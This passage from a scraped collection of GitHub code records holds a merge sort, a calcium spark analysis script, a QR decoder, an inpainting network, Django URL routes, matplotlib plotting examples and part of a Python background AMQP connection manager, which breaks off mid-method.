part_width=w_part_middle+begin_w\n if num_part-(part+1) 1:\n sorted_sequence = []\n\n left_half = MergeSort.merge_sort(sequence[:len(sequence) // 2])\n right_half = MergeSort.merge_sort(sequence[len(sequence) // 2:])\n\n left_index = 0\n right_index = 0\n\n while len(sequence) != len(sorted_sequence):\n if len(left_half) > left_index and len(right_half) > right_index:\n if left_half[left_index] <= right_half[right_index]:\n sorted_sequence.append(left_half[left_index])\n left_index += 1\n else:\n sorted_sequence.append(right_half[right_index])\n right_index += 1\n elif len(left_half) == left_index:\n sorted_sequence.append(right_half[right_index])\n right_index += 1\n else:\n sorted_sequence.append(left_half[left_index])\n left_index += 1\n\n return sorted_sequence\n\n else:\n return sequence\n\na = [8, 10, 3, 7, 13, 2, 42, 6, 0, 6, -9]\n\nprint(MergeSort.merge_sort(a))\n","repo_name":"AnetaStoycheva/Algorithms_HackBulgaria","sub_path":"week1/5-Sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39444377776","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nfrom deepcardio_utils import ImageReader, get_mask, plot_cell\n\nif __name__=='__main__':\n imageReader = ImageReader()\n images = imageReader.get_full_images()\n confsDF, detSparksDF = imageReader.get_spark_simple_data()\n\n plotsFolderPath = os.path.join(imageReader.get_image_folder(), imageReader.get_image_id() + '_xyt_size')\n if not os.path.exists(plotsFolderPath):\n os.makedirs(plotsFolderPath)\n\n xytList = []\n for sparkIdx in range(int(confsDF.loc[0, 'Surviving sparks'])):\n frameIni = int(detSparksDF.loc[sparkIdx, :].tolist()[3]) - 25\n frameFin = int(detSparksDF.loc[sparkIdx, :].tolist()[3]) + 25\n sparkX = int(detSparksDF.loc[sparkIdx, 'Xpix'])\n sparkY = int(detSparksDF.loc[sparkIdx, 'Ypix'])\n maskSize = detSparksDF.loc[sparkIdx, 'FWHM'] / float(confsDF.loc[:, 'Pixel size(um)'])\n mask = get_mask(images.shape[1], images.shape[2], sparkX, sparkY, maskSize)\n\n res = []\n for i in range(frameIni, frameFin + 1):\n res.append(images[i][:, :, 2][mask].mean())\n\n avgS = pd.Series(res)\n rollS = avgS.rolling(3, center=True).mean()\n sparkFrameIdx = rollS.idxmax() + frameIni\n\n plt.plot(avgS)\n plt.plot(rollS)\n plt.scatter(rollS.idxmax(), rollS.max(), c='red')\n plt.title(f\"Spark idx {sparkIdx} on frame {sparkFrameIdx}\")\n plt.savefig(os.path.join(plotsFolderPath, f\"{sparkIdx}.png\"))\n plt.close()\n\n tIni = max(sparkFrameIdx-1, frameIni)\n tFin = min(sparkFrameIdx+1, frameFin)\n xytList.append((sparkX, sparkY, tIni, tFin, maskSize))\n\n xytDF = pd.DataFrame(xytList, columns=['x', 'y', 'tIni', 'tFin', 'pixelSize'])\n storePath = plotsFolderPath + '.csv'\n xytDF.to_csv(storePath, index=False)","repo_name":"raulbenitez/DEEPCARDIO","sub_path":"sparks/train/generate_xyt_on_sparksimple_data.py","file_name":"generate_xyt_on_sparksimple_data.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6863054649","text":"import cv2\n# читаем наше изображение\nimage = cv2.imread(\"vk_qr.png\")\n# инициализируем cv2 QRCode detector\ndetector = cv2.QRCodeDetector()\n# определяем qr и декодируем его\ndata, p_array, b_qrcode = detector.detectAndDecode(image)\n# if there is a QR code print the data\nif p_array is not None:\n print(\"Закодировано:\", data)\nelse:\n print(\"Кажется тут нету QR\")\n","repo_name":"balderfreir/python-pet-small-projects","sub_path":"qrcodedecoder.py","file_name":"qrcodedecoder.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19512362640","text":"import random\nimport numpy as np\nfrom scipy import interpolate\nfrom torch import distributions, nn\nimport torch.nn.functional as f\nfrom torch.utils.data import Dataset\n\nfrom config import *\n\n\nclass ImageSet(Dataset):\n def __init__(self, input, result, boundaries):\n self.input = input\n self.result = result\n self.boundaries = boundaries\n\n def __getitem__(self, item):\n return self.input[item], self.result[item], self.boundaries[item]\n\n def __len__(self):\n return len(self.input)\n\n\nclass Network(torch.nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n self.conv1 = nn.Conv2d(3, 30, kernel_size=5)\n self.bn_conv1 = nn.BatchNorm2d(30)\n self.conv2 = nn.Conv2d(30, 60, kernel_size=5)\n self.bn_conv2 = nn.BatchNorm2d(60)\n self.linear1 = nn.Linear(320 * 3, 1256)\n self.linear2 = nn.Linear(1256, k + k * n + n * l * k + k * n)\n\n def forward(self, x: torch.Tensor):\n x = f.relu(f.max_pool2d(self.bn_conv1(self.conv1(x)), kernel_size=2))\n x = f.relu(f.max_pool2d(self.bn_conv2(self.conv2(x)), kernel_size=2))\n x = x.view(-1, 320 * 3)\n x = f.relu(self.linear1(x))\n x = self.linear2(x)\n x = torch.cat([torch.softmax(x[:, :k], dim=1), x[:, k:]], 1)\n return x\n\n\ndef prepare_input(image):\n image_mod = image.copy()\n x = np.zeros((image_x * image_y,))\n y = np.zeros((image_x * image_y,))\n z = np.zeros((image_x * image_y,))\n counter = 0\n for i, row in enumerate(image_mod):\n for j, a in enumerate(row):\n x[counter] = j\n y[counter] = i\n z[counter] = a\n counter += 1\n img_center_x = image_x / 2\n img_center_y = image_y / 2\n dx = random.randint(-max_random, max_random)\n dy = random.randint(-max_random, max_random)\n hole_beg_x = img_center_x - hole_size_x / 2 + dx\n hole_end_x = img_center_x + hole_size_x / 2 + dx\n hole_beg_y = img_center_y - hole_size_y / 2 + dy\n hole_end_y = img_center_y + hole_size_y / 2 + dy\n mask = []\n\n # remove center rectangle\n for a in range(image_x * image_y):\n if not hole_beg_x < x[a] < hole_end_x or not hole_beg_y < y[a] < hole_end_y:\n mask.append(a)\n x = x[mask]\n y = y[mask]\n z = z[mask]\n # move points to fill hole\n x_old = np.copy(x)\n y_old = np.copy(y)\n b1 = hole_end_y - hole_end_x\n b2 = hole_end_y + hole_beg_x\n for a in range(len(x)):\n if hole_beg_x <= x[a] <= hole_end_x or hole_beg_y <= y[a] <= hole_end_y:\n if x[a] + b1 > y[a] and -x[a] + b2 > y[a]:\n d = (hole_end_y + hole_beg_y) / (2 * hole_beg_y)\n c = (2 - 2 * d) / hole_size_x\n y[a] *= c * abs(x[a] - (hole_beg_x + hole_end_x) / 2) + d\n elif x[a] + b1 < y[a] and -x[a] + b2 < y[a]:\n d = (hole_end_x + hole_beg_x) / (2 * hole_beg_x)\n c = (2 - 2 * d) / hole_size_y\n x[a] *= c * abs(y[a] - (hole_beg_y + hole_end_y) / 2) + d\n elif x[a] + b1 > y[a] > -x[a] + b2:\n d = (hole_end_y + hole_beg_y) / (2 * hole_beg_y)\n c = (2 - 2 * d) / hole_size_x\n y[a] = image_y - (image_y - y[a]) * c * abs(x[a] - (hole_beg_x + hole_end_x) / 2) + d\n\n elif x[a] + b1 < y[a] < -x[a] + b2:\n d = (hole_end_x + hole_beg_x) / (2 * hole_beg_x)\n c = (2 - 2 * d) / hole_size_y\n x[a] = image_x - (image_x - x[a]) * c * abs(y[a] - (hole_beg_y + hole_end_y) / 2) + d\n\n x_2 = np.arange(0, 28, 1)\n y_2 = np.arange(0, 28, 1)\n x_2, y_2 = np.meshgrid(x_2, y_2)\n z_new = interpolate.griddata((x, y), z, (x_2, y_2), method='linear')\n x_new = interpolate.griddata((x, y), x_old, (x_2, y_2), method='linear')\n y_new = interpolate.griddata((x, y), y_old, (x_2, y_2), method='linear')\n return np.stack([z_new, x_new, y_new]), ((hole_beg_x, hole_end_x), (hole_beg_y, hole_end_y))\n\n\ndef loss_function(x: torch.Tensor, orig, boundaries, k, l, n):\n hole_beg_x = boundaries[0][0].int()\n hole_end_x = boundaries[0][1].int()\n hole_beg_y = boundaries[1][0].int()\n hole_end_y = boundaries[1][1].int()\n x = x.view((len(x), -1))\n sum = torch.tensor(0).double().to(device)\n p: torch.Tensor = x[:, :k].reshape(-1, k)\n m: torch.Tensor = x[:, k:k + k * n].reshape(-1, k, n)\n A: torch.Tensor = x[:, k + k * n:k + k * n + n * l * k].reshape(-1, k, n, l)\n d: torch.Tensor = x[:, k + k * n + n * l * k:].reshape(-1, k, n)\n dist = distributions.lowrank_multivariate_normal.LowRankMultivariateNormal(m, A, torch.abs(d))\n layers = torch.stack([orig[i, hole_beg_x[i]:hole_end_x[i], hole_beg_y[i]:hole_end_y[i]] for i in range(len(x))])\n sum = sum - (p.log() + dist.log_prob(layers.reshape(len(layers), 1, -1))).sum()\n return sum\n","repo_name":"Kanciarzek/PictureImpainting","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1463388142","text":"from django.urls import path\nfrom .views import (\n # manage\n manage_list,\n\n # page\n page_list,\n page_create,\n page_update,\n page_delete,\n\n # carousel\n carousel_form,\n carousel_list,\n carousel_update,\n)\n\n\nurlpatterns = [\n path('carousel/list/', carousel_list, name='carousel_list'),\n path('carousel/form/', carousel_form, name='carousel_form'),\n path('carousel/update//', carousel_update, name='carousel_update'),\n\n path('', manage_list, name='manage_list'), #manage/\n\n path('page/list/', page_list, name='page_list'), #page/\n path('page/create/', page_create, name='page_create'), #page/\n path('page/update//', page_update, name='page_update'), #page/\n path('page/delete//', page_delete, name='page_delete'), #page/\n]\n","repo_name":"guvenaltunsoyy/django-kaft-clone","sub_path":"page/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11201303732","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass VisualInduction(object):\n def __init__(self):\n # self.color_argument()\n pass\n\n def single_figure(self):\n # 创建画板\n fig = plt.figure()\n\n # 在画板的第1行第1列的第一个位置生成一个Axes对象来准备作画\n # 也可以通过fig.add_subplot(2, 2, 1)的方式生成Axes\n ax = fig.add_subplot(111)\n\n # xlim横坐标的范围值,xlabel横坐标的单位\n # ylim纵坐标的范围值,ylabel纵坐标的单位\n ax.set(xlim=[0.5, 4.5], ylim=[-2, 8], title='An Example Axes',\n ylabel='Y-Axis', xlabel='X-Axis')\n pass\n\n def more_figure(self):\n fig, axes = plt.subplots(nrows=2, ncols=2)\n ax1 = axes[0, 0]\n ax2 = axes[0, 1]\n ax3 = axes[1, 0]\n ax4 = axes[1, 1]\n\n x = np.linspace(0, np.pi)\n y_sin = np.sin(x)\n y_cos = np.cos(x)\n\n # 前面两个参数为x轴、y轴数据。\n # ax2的第三个参数是 MATLAB风格的绘图,对应ax3上的颜色,marker为点显示的样式。\n ax1.plot(x, y_sin)\n ax2.plot(x, y_sin, 'go--', linewidth=2, markersize=12)\n ax3.plot(x, y_cos, color='red', marker='+', linestyle='dashed')\n\n ax1.set(xlim=[0.5, 4.5], ylim=[-2, 8], title='Upper Left', ylabel='Y-Axis', xlabel='X-Axis')\n\n ax2.set(xlim=[0.5, 4.5], title='Upper Right', ylabel='Y-Axis', xlabel='X-Axis')\n\n ax3.set(ylim=[-2, 8], title='Lower Left', ylabel='Y-Axis', xlabel='X-Axis')\n\n ax4.set(xlim=[0.5, 4.5], ylim=[-2, 8], title='Lower Right', )\n\n def color_argument(self):\n x = np.linspace(0, 20, 200)\n data_obj = {'x': x,\n 'y1': 2 * x + 1,\n 'y2': 3 * x + 1.2,\n 'mean': 0.5 * x * np.cos(2 * x) + 2.5 * x + 1.1}\n print(x)\n fig, ax = plt.subplots()\n\n # 填充两条线之间的颜色:第一个参数为横坐标的内容,第二和第三个参数为填充范围\n ax.fill_between('x', 'y1', 'y2', color='yellow', data=data_obj)\n\n # 设置线条的颜色:前面两个参数为x轴、y轴数据\n ax.plot('x', 'mean', color='black', data=data_obj)\n\n def draw_some(self):\n x = np.arange(10)\n print(x)\n y = np.random.randn(10)\n print(y)\n plt.scatter(x, y, color='red', marker='+')\n\n def draw_bar(self):\n \"\"\"条形图分两种,一种是水平的,一种是垂直的\"\"\"\n np.random.seed(1)\n x = np.arange(5)\n y = np.random.randn(5)\n\n fig, axes = plt.subplots(ncols=2, figsize=plt.figaspect(1. / 2))\n\n # 条形的图的颜色color,条形图的样式\n vert_bars = axes[0].bar(x, y, color='lightblue', align='center')\n horiz_bars = axes[1].barh(x, y, color='yellow', align='edge')\n\n # 在水平或者垂直方向上画线,linewidth为轴的宽度,轴颜色color\n axes[0].axhline(0, color='gray', linewidth=2)\n axes[1].axvline(0, color='gray', linewidth=6)\n\n fig1, ax1 = plt.subplots()\n vert_bars = ax1.bar(x, y, color='lightblue', align='center')\n\n # We could have also done this with two separate calls to `ax.bar` and numpy boolean indexing.\n for bar, height in zip(vert_bars, y):\n if height < 0:\n bar.set(edgecolor='darkred', color='salmon', linewidth=3)\n\n def drow_histogram(self):\n np.random.seed(19680801)\n\n n_bins = 10\n x = np.random.randn(1000, 3)\n\n fig, axes = plt.subplots(nrows=2, ncols=2)\n ax0, ax1, ax2, ax3 = axes.flatten()\n\n colors = ['red', 'tan', 'lime']\n ax0.hist(x, n_bins, density=True, histtype='bar', color=colors, label=colors)\n # 图标颜色说明\n ax0.legend(prop={'size': 10})\n ax0.set_title('bars with legend')\n\n ax1.hist(x, n_bins, density=True, histtype='barstacked')\n ax1.set_title('stacked bar')\n\n ax2.hist(x, histtype='barstacked', rwidth=0.9)\n\n ax3.hist(x[:, 0], rwidth=0.9)\n ax3.set_title('different sample sizes')\n\n fig.tight_layout()\n\n def show_visual(self):\n # 显示画板\n plt.show()\n\n\nif __name__ == '__main__':\n visual = VisualInduction()\n visual.drow_histogram()\n visual.show_visual()\n","repo_name":"namexiaohuihui/operating","sub_path":"tools/Visualization/visual_induction.py","file_name":"visual_induction.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17336131186","text":"\"\"\"A managed AMQP 0.9.1 connection that can safely consume and produce messages asynchronously.\n\nThis is a tricky thing to do safely and also with the potential for high\nperformance, especially in connections with moderate tcp latency such as\nhaving a consumer or producer running on a different machine than the rabbitmq\nbroker.\n\nThe BackgroundAMQPConnection class is designed to be both safe and performant\nwith a simple API designed to allow building worker processes that need to\nconsume messages at high speed and then republish them somewhere else with\nat-least-once semantics in the face of any kind of error.\n\n\nConcurrency Design\n------------------\n\nThe basic design of the class has a single background thread that synchronizes\nall activity on the AMQP connection. Actions are performed by calling methods\non the class instance that queue the action for the background thread and then\neither return immediately (for high performance actions like publishing) or\nblock until the action has been completed (for infrequent actions like registering\na queue). All actions can be queued from any thread without coordination since they\nare synchronized through a single background thread::\n\n BackgroundAMQPConnection\n\n primary thread(s) background_thread\n\n bind_temporary_queue (SYNC)\n - _BindQueue action queued\n - blocked on shared future\n - bind action pulled from queue\n and performed\n - result set in future object\n - future unblocked and returns\n\n\n publish_message (ASYNC)\n - _PublishMessage action queued\n - returns immediately\n\n - publish action pulled from queue\n - message published\n\n [if with_confirm is set]\n - confirmation pulled from connection\n - DeliveryConfirmation object added to\n output messages queue\n\n\nBackgroundAMQPConnection can be used in one of two ways:\n - Queuing: All events are automatically queued in a single queue for polling()\n - Callbacks: All events are immediately dispatched to a single callback\n\n\nQueueing\n--------\n\nGenerally speaking, queuing is easier for simple use cases where a single\napplication is directly managing the connection:\n\nThere is a single centralized `messages`` queue that contains any events that\nthe user's code may need to react to (including the connection being\nterminated). This allows the user to design their application as a loop that\nperforms a blocking ``get()`` on this queue as the main driver of all action.\n\nBased on the event, the user's code can then react to either:\n - a new message being received from a consumer\n - a delivery confirmation being received from a published message\n - the connection being terminated\n\n\nCallbacks\n---------\n\nCallbacks are an advanced use case where you want to distinguish between\nevents as they happen and perhaps route them to different queues for multiple\nsubsystems of your application. In this case, the ``messages`` queue will\nnever be filled and you need to pass a callback into the connection\nconstructor. This callback will be called from the background thread whenever\nan event happens and it **must not block or take an action directly on the\nconnection** and instead deal with the event in whatever way it wants such\nas queuing to an appropriate queue based on what kind of event it is.\n\n\nImplementation Notes\n--------------------\n\n1. The original implementation of this class included multiple channels so\n that a single connection could be used for both consuming and publishing on\n a separate channel on the same connection. However, it seems that py-amqp\n is not stable in that configuration. It would have race conditions and\n framing errors even though it was only being used on a single thread.\n Resolving this led to separating publish and consume operations on separate\n connections as is recommended by rabbitmq as a best practice.\n\"\"\"\n\nfrom typing import Optional, Union, Callable, List, Generator\nfrom threading import Thread\nimport logging\nimport socket\nimport time\nfrom collections import OrderedDict\nfrom dataclasses import dataclass\nfrom concurrent.futures import Future\nfrom queue import SimpleQueue, Empty\nimport amqp\nfrom .telegraf import MonitoringMetric\n\n\n@dataclass\nclass _AcknowledgeMessage:\n \"\"\"Internal action object to represent a basic_ack call.\"\"\"\n\n __slots__ = ['delivery_tag', 'multiple']\n\n delivery_tag: int\n multiple: bool\n\n\n@dataclass\nclass _StartConsuming:\n \"\"\"Internal action object to represent a basic_consume call.\"\"\"\n\n __slots__ = ['queue', 'tag']\n\n queue: str\n tag: Optional[str]\n\n\n@dataclass\nclass _BindQueue:\n \"\"\"Internal action object to represent a register_queue then bind_queue call.\"\"\"\n\n __slots__ = ['queue', 'binding_key', 'exchange']\n\n queue: str\n binding_key: Union[str, List[str]] # Support multiple binding keys\n exchange: str\n\n\n@dataclass\nclass _PublishMessage:\n \"\"\"Internal action object to represent a request to publish a message.\"\"\"\n\n __slots__ = ['message', 'exchange', 'routing_key', 'with_confirm', 'context']\n\n message: amqp.Message\n exchange: str\n routing_key: str\n with_confirm: bool\n context: Optional[object]\n\n\n@dataclass\nclass DeliveryConfirmation:\n \"\"\"Object put into output queue indicating that a published message was confirmed or nacked.\n\n The ``message_contexts`` array will contain on entry for every message\n that is being acknowledged. The value will be whatever context object was\n passed during the call to ``publish_message``. Users should put an object\n into ``context`` that gives them whatever information they need when the\n delivery confirmation comes.\n \"\"\"\n\n __slots__ = ['message_contexts', 'failed']\n\n message_contexts: list\n failed: bool\n\n\n# Turn off nuisance log messages every second at debug level saying we responded to a heartbeat\nlogging.getLogger('amqp.connection.Connection.heartbeat_tick').setLevel(logging.INFO)\n\n\nclass BackgroundAMQPConnection:\n \"\"\"A background AMQP connection designed for high performance producer/consumer applications.\n\n This class should be considered experimental and not yet ready for\n production use but is designed to test out high speed amqp consumers that\n have many messages in flight at the same time.\n \"\"\"\n\n POLL_TIMEOUT = 0.1\n \"\"\"Socket read timeout to check for locally queued actions if there is no network traffic.\n\n 100ms (0.1 seconds) is a good default value that balances responsiveness\n to local commands while not increasing CPU usage excessively just to\n wakeup and check for local actions.\n \"\"\"\n\n CONNECT_TIMEOUT = 5\n \"\"\"Maximum time (in seconds) to wait for a new connection to be opened in start().\"\"\"\n\n MAX_PUBLISH_BACKLOG = 1000\n \"\"\"Default maximum queue size before actions like publish() start to be throttled.\n\n Normally publish_message queues the message to publish and returns\n immediately. However, in certain use cases, this can cause the action\n queue to grow without bound. There is a default size limit of 1000\n imposed. When the queue is at capacity, future actions will be throttled\n and enter a check_size/wait backoff loop before queuing.\n\n This behavior is necessary to allow the use of SimpleQueue() which is an optimized\n C-implemented queue in the python 3.7+ standard library.\n \"\"\"\n\n _IGNORE_CONFIRM = object()\n \"\"\"Internal sentinel value to indicate messages that we do not wish to confirm.\n\n The entire publish channel is set using confirm_select(), so choosing not to\n confirm a given message just means that when its confirmation is received, it\n will not result in a ``DeliveryConfirmation`` object.\n \"\"\"\n\n def __init__(self, host: str, port: int = 5672, username: Optional[str] = None,\n password: Optional[str] = None, *,\n heartbeat: int = 10, max_messages: int = 100, callback: Optional[Callable] = None,\n max_backlog: int = MAX_PUBLISH_BACKLOG):\n self._host = host\n self._port = port\n self._username = username\n self._password = password\n self._heartbeat = heartbeat\n self._max_messages = max_messages\n\n self._next_message_tag = 1\n\n self._thread = None\n self._logger = logging.getLogger(__name__)\n self.messages: SimpleQueue[amqp.Message] = SimpleQueue()\n self._actions: SimpleQueue[amqp.Message] = SimpleQueue()\n self._unconfirmed_publish = OrderedDict()\n self._max_action_backlog = max_backlog\n\n if callback is None:\n callback = self._queue_message_threaded\n\n self._event_callback = callback\n\n def start(self):\n \"\"\"Connect to the amqp 0.9.1 server and configure for use.\n\n This is a synchronous method that will block until the connection is\n established. It uses a background thread to synchronize all activity\n on the connection.\n \"\"\"\n\n future = Future()\n\n self._thread = Thread(target=self._manage_connection_threaded, args=(future,))\n self._thread.start()\n\n # Block, either raises the exception from management thread or waits until we're connected\n try:\n future.result()\n except:\n self._thread.join()\n self._thread = None\n raise\n\n def stop(self):\n \"\"\"Stop the connection and any consumers.\n\n This method will block until the background thread is shutdown.\n \"\"\"\n\n if self._thread is None:\n self._logger.error(\"Stop called with no active thread\")\n return\n\n self._actions.put(None)\n self._thread.join()\n self._thread = None\n\n def bind_temporary_queue(self, queue_name: str, binding_key: Union[str, List[str]], exchange: str = \"amq.topic\"):\n \"\"\"Create a transient exclusive queue for temporary consumption.\n\n This will do two things:\n - it will declare a queue with the given name, set as exclusive so that it dies when this connection\n is stopped\n - it will bind that queue to the given exchange with a binding key.\n\n Both actions will have been completed by the time this method returns.\n\n Args:\n queue_name: Name of the queue to create\n binding_key: Binding key to attach the created queue to an exchange\n exchange: Name of the exchange to bind the queue to\n \"\"\"\n\n action = _BindQueue(queue_name, binding_key, exchange)\n self._perform_action(action, block=True)\n\n def start_consuming(self, queue_name: str, tag: Optional[str] = None) -> str:\n \"\"\"Start consuming from the named queue, which should already exist on the server.\n\n The consumer is always started without automatic acknowledgement,\n which means that you must acknowledge the messages via a call to\n ``acknowledge_message(message_or_delivery_tag)``.\n\n Args:\n queue_name: The name of the queue to consume from\n tag: Optional tag to name this consumer. Autogenerated if not passed.\n\n Returns:\n The tag of the consumer that was started.\n \"\"\"\n\n action = _StartConsuming(queue_name, tag)\n return self._perform_action(action, block=True)\n\n def stop_consuming(self, tag: str): #pylint:disable=no-self-use;This is a placeholder method.\n \"\"\"Stop a previously started consumer.\"\"\"\n\n raise RuntimeError(\"Stop consuming is not yet implemented\")\n\n def iter_events(self, check_interval=0.1) -> Generator[Union[amqp.Message, DeliveryConfirmation, None], None, None]:\n \"\"\"Iterate forever over events, waiting for the next one.\n\n This method uses an internal timeout to block until a message is available\n while still allowing a Ctrl-C event to abort the wait.\n\n Returns:\n The next message received.\n \"\"\"\n\n while True:\n try:\n yield self.messages.get(timeout=check_interval)\n except Empty:\n pass\n\n def acknowledge_message(self, message_or_delivery_tag: Union[amqp.Message, int], multiple: bool = False):\n \"\"\"Acknowledge a message delivered to a consumer on this connection.\n\n This will queue the background thread to send a ``basic_ack`` message\n indicating that the message should be removed from the queue.\n\n Robustness Note:\n ``basic_ack`` is an asynchronous message that has no response from\n the server so there is not a way to write your application to\n block until the server acknowledges the ack. You need to assume\n that your application semantics are at-least-once delivery of each\n message and this is your best-effort way of notifying the server\n that you have successfully processed the message but if you get\n unlucky, it may not get to the server, which means the connection\n is dead and you may get the message again on a future connection\n\n Args:\n message_or_delivery_tag: The consumed message to acknowledge or its delivery tag.\n multiple: Acknowledge all outstanding messages up to and including this one.\n \"\"\"\n\n if isinstance(message_or_delivery_tag, amqp.Message):\n delivery_tag = message_or_delivery_tag.delivery_tag\n else:\n delivery_tag = message_or_delivery_tag\n\n if delivery_tag is None:\n self._logger.debug(\"Ignoring acknowledgement for out-of-band message\")\n return\n\n if not isinstance(delivery_tag, int):\n raise ValueError(\"Unknown delivery tag that was not an integer: %s\" % delivery_tag)\n\n action = _AcknowledgeMessage(delivery_tag, multiple)\n self._logger.log(5, \"Queuing ack for message %s, multiple=%s\", delivery_tag, multiple)\n self._perform_action(action, block=False)\n\n def publish_message(self, exchange: str, routing_key: str, message: amqp.Message,\n *, context: Optional[object] = None, with_confirm: bool = False):\n \"\"\"Queue a message for publishing.\n\n If ``with_confirm = True``, then the message will be sent with delivery confirmation\n and a DeliveryConfirmation object will be put into the ``messages`` queue when the\n message has been confirmed by the broker. Otherwise, no confirmation will be returned.\n\n If a confirmation is returned, it will contain an ``integer`` delivery tag to identify\n which message is being confirmed. The ``delivery_tag`` corresponding to this message\n will be returned by this method.\n\n .. note:\n\n The internal delivery tag for the published message is never exposed directly to\n the user of this method. You can instead pass whatever context object you want\n that will be included in the returned ``DeliveryConfirmation`` and that context\n needs to contain whatever information your application needs in order to correctly\n process the confirmation.\n\n Args:\n exchange: The exchange to receive the message\n routing_key: The routing key to publish the message on\n context: An arbitrary object that will be included in the delivery\n confirmation for this message, if with_confirm is True.\n message: The message that should be published.\n with_confirm: Whether we should listen for a delivery confirmation from this message.\n \"\"\"\n\n action = _PublishMessage(message, exchange, routing_key,\n with_confirm=with_confirm, context=context)\n self._logger.log(5, \"Queueing publish with context %s\", context)\n self._perform_action(action, block=False)\n\n def publish_metric(self, worker_id: str, metric: MonitoringMetric):\n \"\"\"Convenience function to automatically publish a metric.\n\n This method does not reset the metric, it just serializes it and\n publishes it over AMQP without confirmation.\n\n Args:\n worker_id: The id of the worker sending this metric so that we generate the\n correct routing key.\n metric: The metric that should be serialized and reported.\n \"\"\"\n\n self.publish_message('amq.topic', metric.routing_key(worker_id), metric.serialize_amqp(),\n with_confirm=False)\n\n def _perform_action(self, action, block=False, timeout=5.0):\n future = None\n if block:\n future = Future()\n\n start_time = time.monotonic()\n while self._actions.qsize() > self._max_action_backlog:\n time.sleep(0.1)\n if time.monotonic() - start_time > timeout:\n raise RuntimeError(\"Could not queue action in specified timeout, queue too large\")\n\n self._actions.put((action, future))\n\n if future is not None:\n return future.result(timeout=timeout)\n\n return None\n\n def _queue_message_threaded(self, message):\n self.messages.put(message)\n\n def _on_consumer_receive(self, message):\n self._logger.log(5, \"Received message with tag %d from consumer\", message.delivery_tag)\n self._event_callback(message)\n\n def _on_message_ack(self, delivery_tag, multiple):\n messages = self._collect_messages(delivery_tag, multiple)\n if len(messages) > 0:\n confirm = DeliveryConfirmation(messages, False)\n self._logger.log(5, \"Received ack for %d, multiple=%s (%d messages)\", delivery_tag,\n multiple, len(messages))\n\n self._event_callback(confirm)\n\n def _on_message_nack(self, delivery_tag, multiple):\n messages = self._collect_messages(delivery_tag, multiple)\n if len(messages) > 0:\n confirm = DeliveryConfirmation(messages, True)\n\n self._logger.warning(\"Received NACK for %d, multiple=%s\", delivery_tag, multiple)\n self._event_callback(confirm)\n\n def _collect_messages(self, last_tag, multiple):\n messages = []\n if multiple:\n first_tag = next(iter(self._unconfirmed_publish))\n\n for tag in range(first_tag, last_tag + 1):\n context = self._unconfirmed_publish.pop(tag, None)\n if context is None:\n continue # See #677\n\n if context is not self._IGNORE_CONFIRM:\n messages.append(context)\n else:\n self._logger.log(5, \"delivery tag confirmation %d was ignored because with_confirm=False\", tag)\n else:\n context = self._unconfirmed_publish.pop(last_tag)\n if context is not self._IGNORE_CONFIRM:\n messages.append(context)\n else:\n self._logger.log(5, \"delivery tag confirmation %d was ignored because with_confirm=False\", last_tag)\n\n return messages\n\n def _manage_connection_threaded(self, connected_future):\n \"\"\"Background thread routine that manages the amqp connection.\"\"\"\n\n try:\n host_string = \"%s:%s\" % (self._host, self._port)\n\n self._logger.debug(\"Beginning connection to server %s\", host_string)\n\n conn = amqp.Connection(host_string, self._username, self._password,\n login_method='PLAIN', heartbeat=self._heartbeat,\n connect_timeout=self.CONNECT_TIMEOUT)\n\n conn.connect()\n except Exception as err: #pylint:disable=broad-except;This is a background thread and we're logging.\n self._logger.error(\"Count not open connection to %s\", host_string, exc_info=True)\n connected_future.set_exception(err)\n return\n\n self._logger.info(\"Successfully connected to host %s with prefetch=%s\", host_string, self._max_messages)\n connected_future.set_result(None)\n\n connection_open = True\n try:\n last_heartbeat = time.monotonic()\n\n channel = conn.channel()\n channel.basic_qos(0, self._max_messages, True) # True means that this applies to all consumers.\n\n channel.confirm_select() # Make sure we get publish confirmations\n channel.events['basic_ack'].add(self._on_message_ack)\n channel.events['basic_nack'].add(self._on_message_nack)\n\n while True:\n try:\n conn.drain_events(self.POLL_TIMEOUT)\n except socket.timeout:\n # pyamqp does not catch or block socket timeouts, which are expected when\n # there is no traffic on the connection.\n pass\n except (socket.error, amqp.exceptions.ConnectionForced) as err:\n self._logger.error(\"Connection closed from remote side: %s\", str(err))\n connection_open = False\n break\n\n now = time.monotonic()\n\n if (now - last_heartbeat) > 1.0:\n conn.heartbeat_tick()\n last_heartbeat = now\n\n if self._process_actions_threaded(channel):\n connection_open = False\n self._logger.debug(\"Stop received, shutting down connection\")\n break\n except Exception as err: #pylint:disable=broad-except;This is a background thread and we're logging.\n self._logger.error(\"Error managing connection, stopping\", exc_info=True)\n finally:\n try:\n if connection_open:\n conn.close()\n except: #pylint:disable=bare-except;We're in a different exception handler and logging.s\n self._logger.warning(\"Error closing connection after another error\", exc_info=True)\n\n # Always tell whoever is listening to messages that we have closed the connection\n self._event_callback(None)\n\n def _process_actions_threaded(self, channel: amqp.Channel) -> bool:\n \"\"\"Process any pending actions in the background thread.\n\n Note:\n To avoid a situation where we consume new actions slower than they are\n being added and never finish this method, it captures the number of\n actions at start so that it only processes a fixed maximum number per call\n before returning.\n\n TODO:\n 1. Implement ack coelescing so that if we have a run of multiple\n _AcknowledgeMessage actions that are in order with no gaps, we send\n a single multiple_ack for all of them.\n\n Returns:\n Whether the connection is finished and we should stop the background thread.\n \"\"\"\n\n to_process = self._actions.qsize()\n i = 0\n\n # Group actions together so that we are able to coelesce acknowledgements\n actions = []\n while i < to_process:\n try:\n 